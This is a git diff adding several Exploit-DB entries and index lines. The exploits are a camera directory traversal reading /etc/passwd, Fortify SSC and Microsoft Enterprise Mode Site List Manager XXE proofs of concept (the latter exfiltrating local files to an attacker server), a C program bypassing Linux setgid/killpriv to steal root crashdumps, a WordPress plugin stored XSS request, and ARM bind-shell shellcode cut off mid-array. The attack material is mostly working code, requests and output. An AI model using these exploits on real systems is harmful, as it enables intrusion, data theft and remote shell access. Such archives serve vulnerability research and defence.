diff --git a/exploits/hardware/webapps/45030.txt b/exploits/hardware/webapps/45030.txt new file mode 100644 index 000000000..f373ef0cd --- /dev/null +++ b/exploits/hardware/webapps/45030.txt @@ -0,0 +1,22 @@ +Title: Vulnerability in VelotiSmart Wifi - Directory Traversal +Date: 12-07-2018 +Scope: Directory Traversal +Platforms: Unix +Author: Miguel Mendez Z +Vendor: VelotiSmart +Version: B380 +CVE: CVE-2018–14064 + + +Vulnerability description +------------------------- +- The vulnerability that affects the device is LFI type in the uc-http service 1.0.0. What allows to obtain information of configurations, wireless scanned networks, sensitive directories, etc. Of the device. + +Vulnerable variable: +http://domain:80/../../etc/passwd + +Exploit link: +https://github.com/s1kr10s/ExploitVelotiSmart + +Poc: +https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac \ No newline at end of file diff --git a/exploits/java/webapps/45027.txt b/exploits/java/webapps/45027.txt new file mode 100644 index 000000000..64e27e915 --- /dev/null +++ b/exploits/java/webapps/45027.txt @@ -0,0 +1,208 @@ +Details +================ +Software: Fortify SSC (Software Security Center) +Version: 17.10, 17.20 & 18.10 +Homepage: https://www.microfocus.com +Advisory report: https://github.com/alt3kx/CVE-2018-12463 +CVE: CVE-2018-12463 at https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12463 +CVSS: HIGH (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) +CWE-611, CWE-918 + +Description +================ +Out-of-Band XML External Entity (OOB-XXE) An XML External Entity attack is a type of attack against an application that parses XML input. + +This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of +confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. + +Vulnerability +================ +XML external entity (XXE) vulnerability in /ssc/fm-ws/services in Fortify Software Security Center (SSC) 17.10, 17.20 & 18.10 allows remote unauthenticated users to read arbitrary +files or conduct server-side request forgery (SSRF) attacks via a crafted DTD in an XML request. + +Proof of concept Exploit +========================== + +The offending POST method below: + +POST /ssc/fm-ws/services HTTP/1.1 +Accept-Encoding: gzip, deflate +SOAPAction: "" +Accept: text/xml +Content-Type: text/xml; charset=UTF-8; text/html; +Cache-Control: no-cache +Pragma: no-cache +User-Agent: Java/1.8.0_121 +Host: fortifyserver.com +Connection: close +Content-Length: 1765 + + + <-- HERE!!! + + + + + 2018-05-24T14:27:02.619Z + 2018-05-24T14:32:02.619Z + + + XXXXXXX + XXXXXXXXXXX + + + + + + AnalysisUploadToken + + + + +Note: As remark that is not necessary to be used the credentials or any authentication, the POST method above was extracted using Burp Suite to know the +exact API path and data sending to the server. + +RedTeam Vector (1): Using “Transitional” payload, connection to HTTP server (intruder). it works! + +POST /ssc/fm-ws/services HTTP/1.1 +Accept-Encoding: gzip, deflate +SOAPAction: "" +Accept: text/xml +Content-Type: text/xml; charset=UTF-8; text/html; +Cache-Control: no-cache +Pragma: no-cache +User-Agent: Java/1.8.0_121 +Host: fortifyserver.com +Connection: close +Content-Length: 1789 + + + + +[../snip] + +RedTeam Vector (2): Classic "OOB XXE" payload, connection to HTTP server (intruder), it works! + +POST /ssc/fm-ws/services HTTP/1.1 +Accept-Encoding: gzip, deflate +SOAPAction: "" +Accept: text/xml +Content-Type: text/xml; charset=UTF-8 +Cache-Control: no-cache +Pragma: no-cache +User-Agent: Java/1.8.0_121 +Host: fortifyserver.com +Connection: close +Content-Length: 1750 + + + +&send; + +[../snip] + + +RedTeam Vector (3): FTP payload with ruby FTP server emulator + +POST /ssc/fm-ws/services HTTP/1.1 +Accept-Encoding: gzip, deflate +SOAPAction: "" +Accept: text/xml +Content-Type: text/xml; charset=UTF-8 +Cache-Control: no-cache +Pragma: no-cache +User-Agent: Java/1.8.0_121 +Host: fortifyserver.com +Connection: close +Content-Length: 1769 + + + + +[../snip] + + +RedTeam Vector (4): FTP payloads with FTP python server + +POST /ssc/fm-ws/services HTTP/1.1 +Accept-Encoding: gzip, deflate +SOAPAction: "" +Accept: text/xml +Content-Type: text/xml; charset=UTF-8 +Cache-Control: no-cache +Pragma: no-cache +User-Agent: Java/1.8.0_121 +Host: fortifyserver.com +Connection: close +Content-Length: 1769 + + + + +[../snip] + + +RedTeam Vector (5): FTP payload, server compromised + +POST /ssc/fm-ws/services HTTP/1.1 +Accept-Encoding: gzip, deflate +SOAPAction: "" +Accept: text/xml +Content-Type: text/xml; charset=UTF-8 +Cache-Control: no-cache +Pragma: no-cache +User-Agent: Java/1.8.0_121 +Host: fortifyserver.com +Connection: close +Content-Length: 1769 + + + + +[../snip] + + +Mitigations +================ +Provided by the vendor here: + +Document ID: KM03201563 +https://softwaresupport.softwaregrp.com/document/-/facetsearch/document/KM03201563 + +Disclosure policy +================ +We believes in responsible disclosure. +Please contact us on Alex Hernandez aka alt3kx () protonmail com to acknowledge this report. + +This vulnerability will be published if we do not receive a response to this report with 10 days. + +Timeline +================ + +2018-05-24: Discovered +2018-05-25: Retest PRO environment +2018-05-31: Vendor notification, two issues found +2018-05-31: Vendor feedback received +2018-06-01: Internal communication +2018-06-01: Vendor feedback, two issues are confirmed +2018-06-05: Vendor notification, new issue found +2018-06-06: Vendor feedback, evaluating High submission +2018-06-08: Vendor feedback, High issue is confirmed +2018-06-19: Researcher, reminder sent +2018-06-22: Vendor feedback, summary of CVEs handled as official way +2018-06-26: Vendor feedback, official Hotfix for High issue available to test +2018-06-29: Researcher feedback +2018-07-02: Researcher feedback +2018-07-04: Researcher feedback, Hotfix tested on QA environment +2018-07-05: Vendor feedback +2018-07-09: Vendor feedback, final details to disclosure the CVE and official Hotfix availabe for customers. +2018-07-09: Vendor feedback, CVE and official Hotfix to be disclosure +2018-07-12: Agreements with the vendor to publish the CVE/Advisory. +2018-07-12: Public report \ No newline at end of file diff --git a/exploits/linux/dos/45033.c b/exploits/linux/dos/45033.c new file mode 100644 index 000000000..9a8ddeed1 --- /dev/null +++ b/exploits/linux/dos/45033.c @@ -0,0 +1,177 @@ +/* +Note: I am both sending this bug report to security@kernel.org and filing it in +the Ubuntu bugtracker because I can't tell whether this counts as a kernel bug +or as a Ubuntu bug. You may wish to talk to each other to determine the best +place to fix this. + +I noticed halfdog's old writeup at +https://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/ +, describing essentially the following behavior in combination with a +trick for then writing to the resulting file without triggering the +killpriv logic: + + +============= +user@debian:~/sgid_demo$ sudo mkdir -m03777 dir +user@debian:~/sgid_demo$ cat > demo.c +#include +int main(void) { open("dir/file", O_RDONLY|O_CREAT, 02755); } +user@debian:~/sgid_demo$ gcc -o demo demo.c +user@debian:~/sgid_demo$ ./demo +user@debian:~/sgid_demo$ ls -l dir/file +-rwxr-sr-x 1 user root 0 Jun 25 22:03 dir/file +============= + + +Two patches for this were proposed on LKML back then: +"[PATCH 1/2] fs: Check f_cred instead of current's creds in +should_remove_suid()" +https://lore.kernel.org/lkml/9318903980969a0e378dab2de4d803397adcd3cc.1485377903.git.luto@kernel.org/ + +"[PATCH 2/2] fs: Harden against open(..., O_CREAT, 02777) in a setgid directory" +https://lore.kernel.org/lkml/826ec4aab64ec304944098d15209f8c1ae65bb29.1485377903.git.luto@kernel.org/ + +However, as far as I can tell, neither of them actually landed. + + +You can also bypass the killpriv logic with fallocate() and mmap() - +fallocate() permits resizing the file without triggering killpriv, +mmap() permits writing without triggering killpriv (the mmap part is mentioned +at +https://lore.kernel.org/lkml/CAGXu5jLu6OGkQUgqRcOyQ6DABOwZ9HX3fUQ+-zC7NjLukGKnVw@mail.gmail.com/ +): + + +============= +user@debian:~/sgid_demo$ sudo mkdir -m03777 dir +user@debian:~/sgid_demo$ cat fallocate.c +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include + +int main(void) { + int src_fd = open("/usr/bin/id", O_RDONLY); + if (src_fd == -1) + err(1, "open 2"); + struct stat src_stat; + if (fstat(src_fd, &src_stat)) + err(1, "fstat"); + int src_len = src_stat.st_size; + char *src_mapping = mmap(NULL, src_len, PROT_READ, MAP_PRIVATE, src_fd, 0); + if (src_mapping == MAP_FAILED) + err(1, "mmap 2"); + + int fd = open("dir/file", O_RDWR|O_CREAT|O_EXCL, 02755); + if (fd == -1) + err(1, "open"); + if (fallocate(fd, 0, 0, src_len)) + err(1, "fallocate"); + char *mapping = mmap(NULL, src_len, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0); + if (mapping == MAP_FAILED) + err(1, "mmap"); + + + memcpy(mapping, src_mapping, src_len); + + munmap(mapping, src_len); + close(fd); + close(src_fd); + + execl("./dir/file", "id", NULL); + err(1, "execl"); +} +user@debian:~/sgid_demo$ gcc -o fallocate fallocate.c +user@debian:~/sgid_demo$ ./fallocate +uid=1000(user) gid=1000(user) egid=0(root) +groups=0(root),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),116(scanner),121(wireshark),1000(user) +============= + + +sys_copy_file_range() also looks as if it bypasses killpriv on +supported filesystems, but I haven't tested that one so far. + +On Ubuntu 18.04 (bionic), /var/crash is mode 03777, group "whoopsie", and +contains group-readable crashdumps in some custom format, so you can use this +issue to steal other users' crashdumps: + + +============= +user@ubuntu-18-04-vm:~$ ls -l /var/crash +total 296 +-rw-r----- 1 user whoopsie 16527 Jun 25 22:27 _usr_bin_apport-unpack.1000.crash +-rw-r----- 1 root whoopsie 50706 Jun 25 21:51 _usr_bin_id.0.crash +-rw-r----- 1 user whoopsie 51842 Jun 25 21:42 _usr_bin_id.1000.crash +-rw-r----- 1 user whoopsie 152095 Jun 25 21:43 _usr_bin_strace.1000.crash +-rw-r----- 1 root whoopsie 18765 Jun 26 00:42 _usr_bin_xattr.0.crash +user@ubuntu-18-04-vm:~$ cat /var/crash/_usr_bin_id.0.crash +cat: /var/crash/_usr_bin_id.0.crash: Permission denied +user@ubuntu-18-04-vm:~$ cat fallocate.c +*/ + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include + +int main(int argc, char **argv) { + if (argc != 2) { + printf("usage: ./fallocate "); + return 1; + } + int src_fd = open("/bin/cat", O_RDONLY); + if (src_fd == -1) + err(1, "open 2"); + struct stat src_stat; + if (fstat(src_fd, &src_stat)) + err(1, "fstat"); + int src_len = src_stat.st_size; + char *src_mapping = mmap(NULL, src_len, PROT_READ, MAP_PRIVATE, src_fd, 0); + if (src_mapping == MAP_FAILED) + err(1, "mmap 2"); + + unlink("/var/crash/privileged_cat"); /* in case we've already run before */ + int fd = open("/var/crash/privileged_cat", O_RDWR|O_CREAT|O_EXCL, 02755); + if (fd == -1) + err(1, "open"); + if (fallocate(fd, 0, 0, src_len)) + err(1, "fallocate"); + char *mapping = mmap(NULL, src_len, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0); + if (mapping == MAP_FAILED) + err(1, "mmap"); + memcpy(mapping, src_mapping, src_len); + munmap(mapping, src_len); + close(fd); + + execl("/var/crash/privileged_cat", "cat", argv[1], NULL); + err(1, "execl"); +} + +/* +user@ubuntu-18-04-vm:~$ gcc -o fallocate fallocate.c +user@ubuntu-18-04-vm:~$ ./fallocate /var/crash/_usr_bin_id.0.crash > /var/crash/_usr_bin_id.0.crash.stolen +user@ubuntu-18-04-vm:~$ ls -l /var/crash +total 384 +-rwxr-sr-x 1 user whoopsie 35064 Jul 3 19:22 privileged_cat +-rw-r----- 1 user whoopsie 16527 Jun 25 22:27 _usr_bin_apport-unpack.1000.crash +-rw-r----- 1 root whoopsie 50706 Jun 25 21:51 _usr_bin_id.0.crash +-rw-r--r-- 1 user whoopsie 50706 Jul 3 19:22 _usr_bin_id.0.crash.stolen +-rw-r----- 1 user whoopsie 51842 Jun 25 21:42 _usr_bin_id.1000.crash +-rw-r----- 1 user whoopsie 152095 Jun 25 21:43 _usr_bin_strace.1000.crash +-rw-r----- 1 root whoopsie 18765 Jun 26 00:42 _usr_bin_xattr.0.crash +user@ubuntu-18-04-vm:~$ mkdir root_crash_unpacked +user@ubuntu-18-04-vm:~$ # work around bug in apport-unpack +user@ubuntu-18-04-vm:~$ sed -i 's|^UserGroups: $|UserGroups: 0|' /var/crash/_usr_bin_id.0.crash.stolen +user@ubuntu-18-04-vm:~$ apport-unpack /var/crash/_usr_bin_id.0.crash.stolen root_crash_unpacked/ +user@ubuntu-18-04-vm:~$ file root_crash_unpacked/CoreDump +root_crash_unpacked/CoreDump: ELF 64-bit LSB core file x86-64, version 1 (SYSV), SVR4-style, from 'id', real uid: 0, effective uid: 0, real gid: 0, effective gid: 0, execfn: '/usr/bin/id', platform: 'x86_64' +*/ \ No newline at end of file diff --git a/exploits/multiple/dos/45032.txt b/exploits/multiple/dos/45032.txt new file mode 100644 index 000000000..9467b3d5f --- /dev/null +++ b/exploits/multiple/dos/45032.txt @@ -0,0 +1,18 @@ +QuickLook is a widely used feature in macOS/iOS which allows you to preview various formats such as pdf, docx, pptx, etc. The way it uses to show office files is quite interesting. First it parses the office file and converts it to HTML code using OfficeImport and renders it using WebKit. The problem is, it doesn't filter the names of fonts when generating HTML code from them. We can abuse it to inject arbitrary JavaScript code. Namely, we can execute arbitrary JavaScript code via an office file. + +OfficeImport is located at /System/Library/PrivateFrameworks/OfficeImport.framework/Versions/A/OfficeImport. + +I attached a PoC that will just print out "location.href". You can test it by "Right click -> Quick Look" on macOS or just opening the PoC file on iOS. + +Here's the document.xml file of the PoC file where I injected JavaScript code. + + +asdfasdfasdfasdfsasdfadfasadfas + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45032.zip \ No newline at end of file diff --git a/exploits/php/webapps/45031.txt b/exploits/php/webapps/45031.txt new file mode 100644 index 000000000..36a0e0a63 --- /dev/null +++ b/exploits/php/webapps/45031.txt @@ -0,0 +1,102 @@ +# Exploit Title: Wordpress Plugin Job Manager v4.1.0 Stored Cross Site +Scripting +# Google Dork: N/A +# Date: 2018-07-15 +# Exploit Author: Berk Dusunur & Selimcan Ozdemir +# Vendor Homepage: https://wpjobmanager.com +# Software Link: https://downloads.wordpress.org/plugin/wp-job-manager.latest-stable.zip +# Affected Version: v4.1.0 +# Tested on: Parrot OS / WinApp Server +# CVE : N/A + +# Proof Of Concept + + +POST +/post-a-job/?step=%00foymtv%22%20method=%22post%22%20id=%22submit-job-form%22%20class=%22job-manager-form%22%20enctype=%22multipart/form-data%22%3E%3Cscript%3Ealert(%271%27)%3C/script%3E%3Cform%20action=%22/post-a-job/?step=%00foymtv +HTTP/1.1 +Host: target +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:59.0) Gecko/20100101 +Firefox/59.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: +https://target/post-a-job/?step=%00foymtv22%20method=%22post%22%20id=%22submit-job-form%22%20class=%22job-manager-form%22%20enctype=%22multipart/form-data%22%3E%3Cscript%3Ealert(%271%27)%3C/script%3E%3Cform%20action=%22/post-a-job/?step=%00foymtv +Content-Type: multipart/form-data; +boundary=---------------------------3756777582569023921817540904 +Content-Length: 2379 +Cookie: wp-job-manager-submitting-job-id=88664; +wp-job-manager-submitting-job-key=5ae8875580aff +DNT: 1 +Connection: close +Upgrade-Insecure-Requests: 1 +Cache-Control: max-age=0 + +-----------------------------3756777582569023921817540904 +Content-Disposition: form-data; name="job_title" + +teertert

+-----------------------------3756777582569023921817540904 +Content-Disposition: form-data; name="job_description" + +test

test +-----------------------------3756777582569023921817540904 +Content-Disposition: form-data; name="job_region" + +184 +-----------------------------3756777582569023921817540904 +Content-Disposition: form-data; name="job_type" + +2 +-----------------------------3756777582569023921817540904 +Content-Disposition: form-data; name="application" + +www.google.com +-----------------------------3756777582569023921817540904 +Content-Disposition: form-data; name="job_location" + +Adelaide, Australia +-----------------------------3756777582569023921817540904 +Content-Disposition: form-data; name="company_name" + +teertert

+-----------------------------3756777582569023921817540904 +Content-Disposition: form-data; name="company_tagline" + +teertert

+-----------------------------3756777582569023921817540904 +Content-Disposition: form-data; name="company_website" + +www.google.com +-----------------------------3756777582569023921817540904 +Content-Disposition: form-data; name="company_logo"; filename="" +Content-Type: application/octet-stream + + +-----------------------------3756777582569023921817540904 +Content-Disposition: form-data; name="company_poster_name" + +teertert

+-----------------------------3756777582569023921817540904 +Content-Disposition: form-data; name="company_poster_email" + +xssiletarihyazilmaz@gmail.com +-----------------------------3756777582569023921817540904 +Content-Disposition: form-data; name="job_manager_form" + +submit-job +-----------------------------3756777582569023921817540904 +Content-Disposition: form-data; name="job_id" + +0 +-----------------------------3756777582569023921817540904 +Content-Disposition: form-data; name="step" + + +-----------------------------3756777582569023921817540904 +Content-Disposition: form-data; name="submit_job" + +Preview +-----------------------------3756777582569023921817540904-- \ No newline at end of file diff --git a/exploits/windows/local/45026.txt b/exploits/windows/local/45026.txt new file mode 100644 index 000000000..1bed6ab1d --- /dev/null +++ b/exploits/windows/local/45026.txt @@ -0,0 +1,92 @@ +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-ENTERPRISE-MODE-SITE-LIST-MANAGER-XXE.txt +[+] ISR: Apparition Security + + +***Greetz: indoushka | Eduardo*** + + +Vendor +============= +www.microsoft + + +Product +=========== +Enterprise Mode Site List Manager +versions(1/2) + + +You can use IE11 and the Enterprise Mode Site List Manager to add individual website domains and domain paths +and to specify whether the site renders using Enterprise Mode or the default mode. + + + +Vulnerability Type +=================== +XML External Entity Injection + + + +CVE Reference +============== +N/A + + +Security Issue +================ +Versions 1 and 2 of Microsoft Enterprise Mode Site List Manager allow local file exfiltration to a remote attacker controlled server, if the user is tricked +into using an attacker supplied ".emie" site list manager file type. + + + +Exploit/POC +============= +1) python -m SimpleHTTPServer + + + +2) POC.emie + + + + +%dtd;]> +&send; + + +3) payload.dtd + + +"> +%all; + + +Import the POC.emie into Enterprise Mode Site List Manager, then remote attackers will recieve local user files... nice. + + +Network Access +=============== +Remote + + + + +Severity +========= +High + + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 87c8d5bec..3fef71951 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6017,6 +6017,8 @@ id,file,description,date,author,type,platform,port 45012,exploits/windows/dos/45012.js,"Microsoft Edge Chakra JIT - BoundFunction::NewInstance Out-of-Bounds Read",2018-07-12,"Google Security Research",dos,windows, 45013,exploits/windows/dos/45013.js,"Microsoft Edge Chakra JIT - Type Confusion with Hoisted SetConcatStrMultiItemBE Instructions",2018-07-12,"Google Security Research",dos,windows, 45017,exploits/windows/dos/45017.html,"G DATA Total Security 25.4.0.3 - Activex Buffer Overflow",2018-07-13,"Filipe Xavier Oliveira",dos,windows, +45032,exploits/multiple/dos/45032.txt,"macOS/iOS - JavaScript Injection Bug in OfficeImporter",2018-07-16,"Google Security Research",dos,multiple, +45033,exploits/linux/dos/45033.c,"Linux/Ubuntu - Other Users coredumps can be read via setgid Directory and killpriv Bypass",2018-07-16,"Google Security Research",dos,linux, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -9814,6 +9816,7 @@ id,file,description,date,author,type,platform,port 44989,exploits/windows/local/44989.py,"Boxoft WAV to WMA Converter 1.0 - Local Buffer Overflow (SEH)",2018-07-09,Achilles,local,windows, 45010,exploits/linux/local/45010.c,"Linux Kernel < 4.13.9 (Ubuntu 16.04/Fedora 27) - Local Privilege Escalation",2018-07-10,rlarabee,local,linux, 45024,exploits/windows/local/45024.rb,"Microsoft Windows - POP/MOV SS Local Privilege Elevation (Metasploit)",2018-07-13,Metasploit,local,windows, +45026,exploits/windows/local/45026.txt,"Microsoft Enterprise Mode Site List Manager - XML External Entity Injection",2018-07-16,hyp3rlinx,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -16618,7 +16621,7 @@ id,file,description,date,author,type,platform,port 45018,exploits/java/remote/45018.rb,"Manage Engine Exchange Reporter Plus - Remote Code Execution (Metasploit)",2018-07-13,Metasploit,remote,java,8181 45019,exploits/linux/remote/45019.rb,"Apache CouchDB - Arbitrary Command Execution (Metasploit)",2018-07-13,Metasploit,remote,linux,5984 45020,exploits/php/remote/45020.rb,"phpMyAdmin - (Authenticated) Remote Code Execution (Metasploit)",2018-07-13,Metasploit,remote,php,80 -45025,exploits/linux/remote/45025.rb,"Hadoop YARN ResourceManager - Unauthenticated Command Execution (Metasploit)",2018-07-13,Metasploit,remote,linux,8088 +45025,exploits/linux/remote/45025.rb,"Hadoop YARN ResourceManager - Command Execution (Metasploit)",2018-07-13,Metasploit,remote,linux,8088 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -39657,6 +39660,9 @@ id,file,description,date,author,type,platform,port 45002,exploits/hardware/webapps/45002.py,"D-Link DIR601 2.02 - Credential Disclosure",2018-07-10,"Thomas Zuk",webapps,hardware, 45003,exploits/php/webapps/45003.txt,"Instagram-Clone Script 2.0 - Cross-Site Scripting",2018-07-11,L0RD,webapps,php, 45007,exploits/multiple/webapps/45007.txt,"Dicoogle PACS 2.5.0 - Directory Traversal",2018-07-11,"Carlos Avila",webapps,multiple, +45030,exploits/hardware/webapps/45030.txt,"VelotiSmart WiFi B-380 Camera - Directory Traversal",2018-07-16,"Miguel Mendez Z",webapps,hardware,80 45015,exploits/hardware/webapps/45015.txt,"QNAP Qcenter Virtual Appliance - Multiple Vulnerabilities",2018-07-13,"Core Security",webapps,hardware,443 45016,exploits/php/webapps/45016.txt,"Zeta Producer Desktop CMS 14.2.0 - Remote Code Execution / Local File Disclosure",2018-07-13,"SEC Consult",webapps,php,80 45022,exploits/hardware/webapps/45022.txt,"Grundig Smart Inter@ctive 3.0 - Cross-Site Request Forgery",2018-07-13,t4rkd3vilz,webapps,hardware, +45027,exploits/java/webapps/45027.txt,"Fortify Software Security Center (SSC) 17.x/18.1 - XML External Entity Injection",2018-07-16,alt3kx,webapps,java, +45031,exploits/php/webapps/45031.txt,"WordPress Plugin Job Manager 4.1.0 - Cross-Site Scripting",2018-07-16,"Berk Dusunur",webapps,php, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 05f42857c..afb23bb55 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -894,3 +894,4 @@ id,file,description,date,author,type,platform 44856,shellcodes/arm/44856.c,"Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (60 bytes)",2018-06-08,rtmcx,shellcode,arm 44963,shellcodes/linux_x86/44963.c,"Linux/x86 - Execve /bin/cat /etc/passwd Shellcode (37 bytes)",2018-07-02,"Anurag Srivastava",shellcode,linux_x86 44990,shellcodes/linux_x86/44990.c,"Linux/x86 - Kill Process Shellcode (20 bytes)",2018-07-09,"Nathu Nandwani",shellcode,linux_x86 +45029,shellcodes/arm/45029.c,"Linux/ARM - Bind (1234/TCP) Shell (/bin/sh) Shellcode (104 bytes)",2018-07-16,odzhancode,shellcode,arm diff --git a/shellcodes/arm/45029.c b/shellcodes/arm/45029.c new file mode 100644 index 000000000..f4002f0ac --- /dev/null +++ b/shellcodes/arm/45029.c @@ -0,0 +1,179 @@ +/** + Copyright © 2017 Odzhan. All Rights Reserved. + + Redistribution and use in source and binary forms, with or without + modification, are permitted provided that the following conditions are + met: + + 1. Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. + + 2. Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + + 3. The name of the author may not be used to endorse or promote products + derived from this software without specific prior written permission. + + THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR + IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED + WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, + INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES + (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) + HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, + STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN + ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE + POSSIBILITY OF SUCH DAMAGE. */ + +#include +#include +#include +#include + +#include +#include +#include + +#ifndef CONNECT + +// bind shell +#define CODE_SIZE 104 + +char CODE[] = { + /* 0000 */ "\x54\x40\x9f\xe5" /* ldr r4, [pc, #0x54] */ + /* 0004 */ "\x54\x50\x9f\xe5" /* ldr r5, [pc, #0x54] */ + /* 0008 */ "\x54\x60\x9f\xe5" /* ldr r6, [pc, #0x54] */ + /* 000C */ "\x01\x30\x8f\xe2" /* add r3, pc, #1 */ + /* 0010 */ "\x13\xff\x2f\xe1" /* bx r3 */ + /* 0014 */ "\x52\x40" /* eors r2, r2 */ + /* 0016 */ "\x01\x21" /* movs r1, #1 */ + /* 0018 */ "\x0f\x02" /* lsls r7, r1, #8 */ + /* 001A */ "\x19\x37" /* adds r7, #0x19 */ + /* 001C */ "\x02\x20" /* movs r0, #2 */ + /* 001E */ "\x01\xdf" /* svc #1 */ + /* 0020 */ "\x80\x46" /* mov r8, r0 */ + /* 0022 */ "\x21\x1c" /* adds r1, r4, #0 */ + /* 0024 */ "\x06\xb4" /* push {r1, r2} */ + /* 0026 */ "\x69\x46" /* mov r1, sp */ + /* 0028 */ "\x4a\x70" /* strb r2, [r1, #1] */ + /* 002A */ "\x10\x22" /* movs r2, #0x10 */ + /* 002C */ "\x01\x37" /* adds r7, #1 */ + /* 002E */ "\x01\xdf" /* svc #1 */ + /* 0030 */ "\x01\x21" /* movs r1, #1 */ + /* 0032 */ "\x40\x46" /* mov r0, r8 */ + /* 0034 */ "\x02\x37" /* adds r7, #2 */ + /* 0036 */ "\x01\xdf" /* svc #1 */ + /* 0038 */ "\x52\x40" /* eors r2, r2 */ + /* 003A */ "\x49\x40" /* eors r1, r1 */ + /* 003C */ "\x40\x46" /* mov r0, r8 */ + /* 003E */ "\x01\x37" /* adds r7, #1 */ + /* 0040 */ "\x01\xdf" /* svc #1 */ + /* 0042 */ "\x80\x46" /* mov r8, r0 */ + /* 0044 */ "\x03\x21" /* movs r1, #3 */ + /* 0046 */ "\x3f\x27" /* movs r7, #0x3f */ + /* 0048 */ "\x40\x46" /* mov r0, r8 */ + /* 004A */ "\x01\x39" /* subs r1, #1 */ + /* 004C */ "\x01\xdf" /* svc #1 */ + /* 004E */ "\xfa\xd1" /* bne #0x46 */ + /* 0050 */ "\x17\x1c" /* adds r7, r2, #0 */ + /* 0052 */ "\xe0\xb4" /* push {r5, r6, r7} */ + /* 0054 */ "\x68\x46" /* mov r0, sp */ + /* 0056 */ "\x0b\x27" /* movs r7, #0xb */ + /* 0058 */ "\x01\xdf" /* svc #1 */ + /* 005A */ "\xc0\x46" /* mov r8, r8 */ + /* 005C */ "\x02\xff\x04\xd2" /* AF_INET, 1234 */ + /* 0060 */ "\x2f\x62\x69\x6e" /* /bin */ + /* 0064 */ "\x2f\x2f\x73\x68" /* //sh */ +}; + +#else + + +char CODE[] = { + /* 0000 */ "\x44\x30\x9f\xe5" /* ldr r3, [pc, #0x44] */ + /* 0004 */ "\x44\x40\x9f\xe5" /* ldr r4, [pc, #0x44] */ + /* 0008 */ "\x44\x50\x9f\xe5" /* ldr r5, [pc, #0x44] */ + /* 000C */ "\x44\x60\x9f\xe5" /* ldr r6, [pc, #0x44] */ + /* 0010 */ "\x01\x00\x8f\xe2" /* add r0, pc, #1 */ + /* 0014 */ "\x10\xff\x2f\xe1" /* bx r0 */ + /* 0018 */ "\x52\x40" /* eors r2, r2 */ + /* 001A */ "\x01\x21" /* movs r1, #1 */ + /* 001C */ "\x02\x20" /* movs r0, #2 */ + /* 001E */ "\x0f\x02" /* lsls r7, r1, #8 */ + /* 0020 */ "\x19\x37" /* adds r7, #0x19 */ + /* 